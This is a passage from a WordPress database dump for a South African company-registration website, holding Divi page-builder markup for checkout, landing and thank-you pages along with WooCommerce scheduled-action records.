custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"600ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" locked=\"off\" _i=\"1\" _address=\"1.1.1\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"2\" _address=\"1.2\"][et_pb_blurb title=\"Personal Liability Company\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" locked=\"off\" _i=\"0\" _address=\"1.2.0\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"2.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"2.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"2.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-22 15:52:09','2019-08-22 13:52:09','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(33127,0,'2019-08-22 14:00:17','2019-08-22 14:00:17','{\"update_callback\":\"wc_update_370_tax_rate_classes\"}','woocommerce_run_update_callback','','publish','open','closed','','scheduled-action-5d5e9ff34b4fb9.90535720-qh2lhhZCvRfaBxW7DZjQAPvNFhveLR1W','','','2019-08-22 16:00:19','2019-08-22 14:00:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33127',0,'scheduled-action','',3),(33128,0,'2019-08-22 14:00:18','2019-08-22 14:00:18','{\"update_callback\":\"wc_update_370_mro_std_currency\"}','woocommerce_run_update_callback','','publish','open','closed','','scheduled-action-5d5e9ff351e4e0.39009815-kX0qaP3pb1NGNtKNzoSjBq1gA4bRPGro','','','2019-08-22 16:00:19','2019-08-22 14:00:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33128',0,'scheduled-action','',3),(33129,0,'2019-08-22 14:00:19','2019-08-22 14:00:19','{\"update_callback\":\"wc_update_370_db_version\"}','woocommerce_run_update_callback','','publish','open','closed','','scheduled-action-5d5e9ff355fa58.75014979-vtLJKnCjHRclKqiCNUdBesh6NhopeaAX','','','2019-08-22 16:00:19','2019-08-22 14:00:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33129',0,'scheduled-action','',3),(33130,1,'2019-08-22 16:04:49','2019-08-22 14:04:49','','Company Registration R875 less 20%','','publish','closed','closed','','31300-2','','','2019-08-24 14:42:56','2019-08-24 12:42:56','',0,'https://companyregistration.online/?cartflows_flow=31300-2',0,'cartflows_flow','',0),(33131,1,'2019-08-22 16:04:49','2019-08-22 14:04:49','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"rgba(196,0,121,0.96)\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/bg-graphics.png\" min_height=\"310px\" custom_padding=\"33px||170px|||\" custom_padding_tablet=\"50px||130px\"][et_pb_row column_structure=\"1_4,1_2,1_4\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"0|0px|0|0px|false|false\" make_equal=\"on\" module_class=\"vertical-align-middle\" _builder_version=\"3.26.3\" width=\"94%\" max_width=\"1917px\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/CoReg-Insane-Offer-Conversion-Ad.jpg\" _builder_version=\"3.26.3\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"43px\" header_3_line_height=\"1.2em\" header_3_text_shadow_style=\"preset5\" header_3_text_shadow_horizontal_length=\"0.12em\" header_3_text_shadow_vertical_length=\"0.13em\" header_3_text_shadow_blur_strength=\"0.02em\" background_layout=\"dark\" custom_margin=\"-22px||||false|false\" text_line_height_last_edited=\"on|desktop\"]<h3>Get Your Company Registered for <span style=\"color: #ffffff;\">R199</span></h3>\r\n<p><span style=\"font-size: xx-large;\">Save an Incredible R551</span></p>[/et_pb_text][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"40px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" custom_margin=\"-10px||||false|false\" text_line_height_last_edited=\"on|desktop\"]<p>Indecision can be exhausting start your business today</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Headline: Features & Benefits\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"25px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"28px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" text_line_height_last_edited=\"on|desktop\"]<h3>Features &amp; Benefits</h3>[/et_pb_text][et_pb_blurb title=\"Simple, Convenient & Professionally done\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Clinically Tested Formula\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\"][/et_pb_blurb][et_pb_blurb title=\"100% Money back Guarantee\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: 100% Guaranteed Weight Gain\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\"][/et_pb_blurb][et_pb_blurb title=\"Professional consultants ready to assist\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Best Results For Regular Consumption\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0px||120px||false|false\" custom_padding_tablet=\"||50px\" custom_padding_phone=\"||30px\" custom_margin=\"-174px||||false|false\" make_equal=\"on\" custom_padding_last_edited=\"on|phone\" padding_top_bottom_link_2=\"true\" padding_left_right_link_1=\"true\" padding_left_right_link_2=\"true\" _builder_version=\"3.26.3\" border_radii=\"on|20px|20px|20px|20px\" border_width_all=\"1px\" border_color_all=\"rgba(255,255,255,0)\" box_shadow_style=\"preset1\" box_shadow_horizontal=\"-13px\" box_shadow_vertical=\"-11px\" box_shadow_blur=\"16px\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" background_color=\"#f9f9f9\" custom_padding=\"30px|40px|50px|40px\" custom_padding_tablet=\"|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|desktop\" custom_padding__hover=\"|||\"][et_pb_code admin_label=\"Checkout  Shortcode\" _builder_version=\"3.19.11\"][cartflows_checkout][/et_pb_code][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" background_color=\"#edeef2\" custom_padding=\"40px|40px|40px|40px\" custom_padding_tablet=\"30px|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|phone\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/satisfaction-guarantee-2109235_1280.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Money Back Image\" _builder_version=\"3.26.3\" max_width=\"30%\" module_alignment=\"left\" custom_margin=\"||20px|0px|false|false\" custom_padding=\"|||0px|false|false\" filter_hue_rotate=\"14deg\" filter_saturate=\"200%\" filter_brightness=\"107%\" filter_contrast=\"81%\"][/et_pb_image][et_pb_text admin_label=\"Headline and Text: 30 Days Full Refund Policy.\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" header_font=\"Poppins||||||||\" header_3_font=\"Poppins|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\"]<h3>100% Money Back. No-Risk.</h3>\r\n<h3>Full Refund Policy.</h3>\r\nNo Risk guarantee, if you not happy at any time, prior to registration of your company, we will refund you 100%, no questions asked.[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Success Stories\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\"]<h3>Success Stories</h3>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.23\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\"]<p>\"They have impressed me with their knowledge and efficiency. The professionals have always been very helpful to myself and my clients.”</p>[/et_pb_text][et_pb_blurb title=\"Gretchen Rose Matthews \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" custom_margin=\"-15px||||false|false\" body_line_height=\"1.3em\"]<p>Senior Consultant, Constructive Consulting Group (Pty) Ltd</p>[/et_pb_blurb][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.26.3\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\"]<p>“companyregistration.online is one of the most dynamic, modest, modern, up to date and well informed service providers we have ever used”</p>[/et_pb_text][et_pb_blurb title=\"Silas Gidzha \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" custom_margin=\"-15px||||false|false\" body_line_height=\"1.3em\"]<p>CEO, S&amp;S Orthopedic Services (Pty)Ltd</p>[/et_pb_blurb][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" custom_margin=\"||20px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.3\" custom_margin=\"-50px||||false|false\"]<p>[hurrytimer id=\"31525\"]</p>[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.26.3\" height=\"46px\" custom_margin=\"-14px||20px||false|false\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Frequent Queries\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\"]<h3>Frequent Queries</h3>[/et_pb_text][et_pb_accordion open_toggle_text_color=\"#242f6b\" open_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"rgba(36,47,107,0.8)\" closed_toggle_background_color=\"#ffffff\" admin_label=\"Accordion: FAQ\" _builder_version=\"3.26.3\" toggle_font=\"Roboto|500|||||||\" body_font=\"Roboto||||||||\" body_text_color=\"#000000\" border_color_all=\"#f2f2f2\"][et_pb_accordion_item title=\"Where are your offices located?\" open=\"on\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\"]<p>101 Rose Avenue, Lenasia, Johannesburg, 1827. Call 010 592 7717</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"What do I need to register my company ?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" open=\"off\"]<p>Once the order is made an email will be sent containg all the all the requirements</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"How long does it take to register?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" open=\"off\"]<p>Typically it takes between 3-5days, CIPC delays may extend the duration</p>[/et_pb_accordion_item][/et_pb_accordion][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.3\"][et_pb_row column_structure=\"1_2,1_2\" custom_margin=\"-43px||||false|false\" _builder_version=\"3.26.3\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web-e1563787290497.png\" _builder_version=\"3.26.3\" width=\"54%\" max_width=\"54%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\"][et_pb_text _builder_version=\"3.26.3\"]<p style=\"text-align: right;\">@2018</p>\n<p style=\"text-align: right;\">Powered By: Digital Power Solutions (Pty)Ltd</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','SA Company Registration Checkout','','publish','closed','closed','','sa-company-registration-2','','','2019-08-22 16:04:49','2019-08-22 14:04:49','',0,'https://companyregistration.online/sa-company-registration-2/',0,'cartflows_step','',0),(33132,1,'2019-08-22 16:04:49','2019-08-22 14:04:49','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"#faf9ff\" custom_margin=\"-230px||||false|false\" custom_padding=\"25px||140px\" custom_padding_tablet=\"50px||50px\" custom_padding_phone=\"30px||30px\"][et_pb_row custom_padding=\"0px||0px||true\" custom_margin=\"0px||0px||true\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_code admin_label=\"Note: Important Styling (Don\'t Remove or you can do CSS customization here)\" _builder_version=\"3.19.9\" custom_margin=\"0px||0px||true\" custom_padding=\"0px||0px||true\"]<style><!-- [et_pb_line_break_holder] -->body {<!-- [et_pb_line_break_holder] -->	font-weight: 400;<!-- [et_pb_line_break_holder] -->}<!-- [et_pb_line_break_holder] -->.et_fixed_nav.et_show_nav #page-container, .et_non_fixed_nav.et_transparent_nav.et_show_nav #page-container {<!-- [et_pb_line_break_holder] -->    padding-top: 0;<!-- [et_pb_line_break_holder] -->}<!-- [et_pb_line_break_holder] -->.vertical-align-middle {<!-- [et_pb_line_break_holder] -->	align-items:center;<!-- [et_pb_line_break_holder] -->	align-self:center;<!-- [et_pb_line_break_holder] -->}<!-- [et_pb_line_break_holder] --></style>[/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Thank You \" use_icon=\"on\" font_icon=\"%%202%%\" icon_color=\"#61ce70\" content_max_width=\"648px\" admin_label=\"Headline: Thank you\" _builder_version=\"3.26.3\" header_font=\"Poppins||||||||\" header_text_color=\"#e03d52\" header_font_size=\"50px\" body_font=\"Poppins||||||||\" body_text_color=\"rgba(0,0,0,0.55)\" body_font_size=\"20px\" text_orientation=\"center\" header_font_size_tablet=\"24px\" header_font_size_last_edited=\"on|phone\"]<p><strong>Congratulations</strong>, you have taken a bold step.</p>\r\n<p>It\'s being proven time and time again that the best returns on any investment comes from a well run business.</p>\r\n<p><strong>Check your email for the details on what to do next</strong></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.25\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Confirmation on what you will receive\" content_max_width=\"648px\" admin_label=\"Headline: Thank you\" _builder_version=\"3.26.3\" header_font=\"Poppins|600|||||||\" header_text_color=\"#e03d52\" header_font_size=\"20px\" body_font=\"Poppins||||||||\" body_text_color=\"rgba(0,0,0,0.55)\" body_ul_font=\"||||||||\" body_ul_line_height=\"1.7em\" header_font_size_tablet=\"24px\" header_font_size_last_edited=\"on|phone\"]<ul>\r\n<li>- Name reservation based on <span data-dobid=\"hdw\">dissimilar</span> names</li>\r\n<li>- Registered company</li>\r\n<li>- Tax Clearance, if required</li>\r\n</ul>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web.png\" _builder_version=\"3.26.3\" custom_padding=\"25px||||false|false\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.26.3\"][et_pb_column type=\"4_4\" _builder_version=\"3.26.3\"][et_pb_text _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" custom_margin=\"-25px||-33px||false|false\"]<p style=\"text-align: center;\"><em><strong>Our office number is 010 592 7717 should you have any questions, ask for a registration consultant</strong></em></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_color=\"#ffffff\" custom_padding=\"2px||50px\"][et_pb_row custom_padding=\"50px|20px|50px|20px|true|true\" custom_margin=\"-90px||\" _builder_version=\"3.25\" background_color=\"#ffffff\" border_radii=\"on|3px|3px|3px|3px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"0px\" box_shadow_blur=\"20px\" box_shadow_color=\"rgba(0,0,0,0.1)\" max_width=\"880px\" custom_margin_tablet=\"-60px||\" custom_margin_phone=\"-30px||\" custom_margin_last_edited=\"on|phone\" use_custom_width=\"on\" custom_width_px=\"880px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_code admin_label=\"Order Details Shortcode\" _builder_version=\"3.19.11\"][cartflows_order_details][/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" custom_padding=\"35px|20px|35px|20px|true|true\" custom_margin=\"30px||\" _builder_version=\"3.25\" border_radii=\"on|3px|3px|3px|3px\" max_width=\"880px\" use_custom_width=\"on\" custom_width_px=\"880px\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" admin_label=\"Headline: Join Our Community\" _builder_version=\"3.19.11\" text_font=\"Poppins||||||||\" text_text_color=\"#7a7a7a\" header_font=\"||||||||\" header_2_font=\"Poppins|700|||||||\" header_2_text_align=\"left\" header_2_text_color=\"#54595f\" header_2_font_size=\"22px\" module_alignment=\"right\" header_2_font_size_tablet=\"22px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|tablet\"]<h2>Join Our Community</h2>\r\nClick edit button to change this text. Lorem ipsum dolor sit amet,[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_social_media_follow _builder_version=\"3.19.9\" text_orientation=\"center\"][et_pb_social_media_follow_network social_network=\"facebook\" _builder_version=\"3.19.9\" background_color=\"#3b5998\" border_radii=\"on|5px|5px|5px|5px\" custom_padding=\"5px|5px|5px|5px|true|true\" follow_button=\"off\" url_new_window=\"on\"]facebook[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"twitter\" _builder_version=\"3.19.9\" background_color=\"#00aced\" border_radii=\"on|5px|5px|5px|5px\" custom_padding=\"5px|5px|5px|5px|true|true\" follow_button=\"off\" url_new_window=\"on\"]twitter[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"google-plus\" _builder_version=\"3.19.9\" background_color=\"#dd4b39\" border_radii=\"on|5px|5px|5px|5px\" custom_padding=\"5px|5px|5px|5px|true|true\" follow_button=\"off\" url_new_window=\"on\"]google-plus[/et_pb_social_media_follow_network][/et_pb_social_media_follow][/et_pb_column][/et_pb_row][/et_pb_section]','Thank You CoReg','','publish','closed','closed','','thank-you-coreg-2','','','2019-08-22 16:04:49','2019-08-22 14:04:49','',0,'https://companyregistration.online/thank-you-coreg-2/',0,'cartflows_step','',0),(33134,1,'2019-08-22 16:06:19','2019-08-22 14:06:19','','Company Registration R399','','publish','closed','closed','','31300-3','','','2019-08-24 14:41:14','2019-08-24 12:41:14','',0,'https://companyregistration.online/?cartflows_flow=31300-3',0,'cartflows_flow','',0),(33135,1,'2019-08-22 16:06:19','2019-08-22 14:06:19','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"rgba(196,0,121,0.96)\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/bg-graphics.png\" min_height=\"310px\" custom_padding=\"33px||170px|||\" custom_padding_tablet=\"50px||130px\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" module_class=\"vertical-align-middle\" _builder_version=\"3.26.3\" width=\"94%\" max_width=\"1917px\" custom_padding=\"0|0px|0|0px|false|false\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"43px\" header_3_line_height=\"1.2em\" header_3_text_shadow_style=\"preset5\" header_3_text_shadow_horizontal_length=\"0.12em\" header_3_text_shadow_vertical_length=\"0.13em\" header_3_text_shadow_blur_strength=\"0.02em\" background_layout=\"dark\" custom_margin=\"-22px||||false|false\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.1.0\"]<h3>Get Your Company Registered for <span style=\"color: #ffffff;\">R399</span></h3>\r\n<p><span style=\"font-size: xx-large;\">Save an Incredible R851</span></p>[/et_pb_text][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"40px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" custom_margin=\"-10px||||false|false\" text_line_height_last_edited=\"on|desktop\" _i=\"1\" _address=\"0.0.1.1\"]<p>Indecision can be exhausting start your business today</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"0.0.1\"][et_pb_text admin_label=\"Headline: Features & Benefits\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"25px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"28px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.2.0\"]<h3>Features &amp; Benefits</h3>[/et_pb_text][et_pb_blurb title=\"Simple, Convenient & Professionally done\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Clinically Tested Formula\" _builder_version=\"3.27.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"0px|||60px|false|false\" _i=\"1\" _address=\"0.0.2.1\" hover_enabled=\"0\"][/et_pb_blurb][et_pb_blurb title=\"100% Money back Guarantee\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: 100% 